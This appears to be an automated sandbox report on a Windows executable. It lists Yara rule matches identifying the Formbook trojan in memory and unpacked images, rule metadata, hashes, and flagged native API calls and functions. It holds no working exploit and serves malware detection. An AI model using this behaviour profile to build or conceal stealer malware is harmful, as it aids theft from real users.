Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: Lc8xQv8iZY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Detected potential crypto function
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_004168DD 1_2_004168DD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040B504 1_2_0040B504
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040C24D 1_2_0040C24D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040BA00 1_2_0040BA00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040BE18 1_2_0040BE18
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040C682 1_2_0040C682
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80227 1_2_00B80227
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B804D1 1_2_00B804D1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012B0 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0042193D 3_2_0042193D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00421284 3_2_00421284
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012A4 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040B453 3_2_0040B453
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040B457 3_2_0040B457
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00422429 3_2_00422429
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004044C7 3_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004044BE 3_2_004044BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004046E7 3_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040FE87 3_2_0040FE87
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B820A8 3_2_00B820A8
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB090 3_2_00ACB090
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B828EC 3_2_00B828EC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8E824 3_2_00B8E824
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71002 3_2_00B71002
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABF900 3_2_00ABF900
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B822AE 3_2_00B822AE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FA2B 3_2_00B6FA2B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEEBB0 3_2_00AEEBB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7DBD2 3_2_00B7DBD2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B703DA 3_2_00B703DA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82B28 3_2_00B82B28
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAB40 3_2_00ADAB40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC841F 3_2_00AC841F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7D466 3_2_00B7D466
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B825DD 3_2_00B825DD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB0D20 3_2_00AB0D20
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82D07 3_2_00B82D07
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81D55 3_2_00B81D55
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82EF7 3_2_00B82EF7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD6E30 3_2_00AD6E30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7D616 3_2_00B7D616
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81FF1 3_2_00B81FF1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8DFCE 3_2_00B8DFCE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: String function: 00ABB150 appears 45 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E087 NtAllocateVirtualMemory, 3_2_0041E087
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory, 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DEA7 NtCreateFile, 3_2_0041DEA7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DF57 NtReadFile, 3_2_0041DF57
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DFD7 NtClose, 3_2_0041DFD7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E081 NtAllocateVirtualMemory, 3_2_0041E081
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012A4 EntryPoint,NtProtectVirtualMemory, 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004014E9 NtProtectVirtualMemory, 3_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DF52 NtReadFile, 3_2_0041DF52
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DFD2 NtClose, 3_2_0041DFD2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00AF98F0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00AF9860
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk, 3_2_00AF9840
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk, 3_2_00AF99A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00AF9910
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk, 3_2_00AF9A20
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00AF9A00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk, 3_2_00AF9A50
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF95D0 NtClose,LdrInitializeThunk, 3_2_00AF95D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk, 3_2_00AF9540
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00AF96E0
